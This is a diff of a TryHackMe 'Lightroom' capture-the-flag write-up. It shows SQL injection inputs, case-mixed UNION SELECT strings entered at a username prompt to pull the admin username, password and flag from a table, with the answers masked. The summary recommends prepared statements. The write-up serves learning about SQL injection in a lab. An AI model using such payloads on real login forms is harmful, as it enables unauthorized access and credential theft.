garthheff/CTF-Writeups/TryHackMe/lightroom.md

                    password INTEGER)
 ```

-What is the admin username?
+### What is the admin username?
 ```
 Please enter your username: ' UnIoN SeLeCt username FROM admintable'
 Password: ##########
 ```
-What is the password to the username mentioned in question 1?
+### What is the password to the username mentioned in question 1?
 ```
 Please enter your username: ' UnIoN SeLeCt password FROM admintable where username = '##########
 Password: ##########
 ```

-What is the flag?
+### What is the flag?
 ```
 Please enter your username: ' UnIoN SeLeCt password FROM admintable'
 Password: ##########
 ```

 # Summary
-Nice room to show why custom frameworks for preventing SQLi is a bad idea, took me a bit to long to start with SQLi and was focused on Bruteforcing.
-Including bruteforcing script below as while it didn't work it's a good showcase for pwntools
+Nice room to show why custom built frameworks for preventing SQLi is a bad idea and to use [prepared statements](https://www.sqlite.org/c3ref/stmt.html).
+Also a good room for showcasing locating SQL version and extracting tables and column data.
+It took me a bit to long to start with SQLi and was focused on bruteforcing, although I do enjoy a pwntools script so was a bit of a side challenge.
+Including bruteforcing script below as while it didn't work it's a good showcase for pwntools so included in the walkthrough even though it was a failed path.

 # failed exploration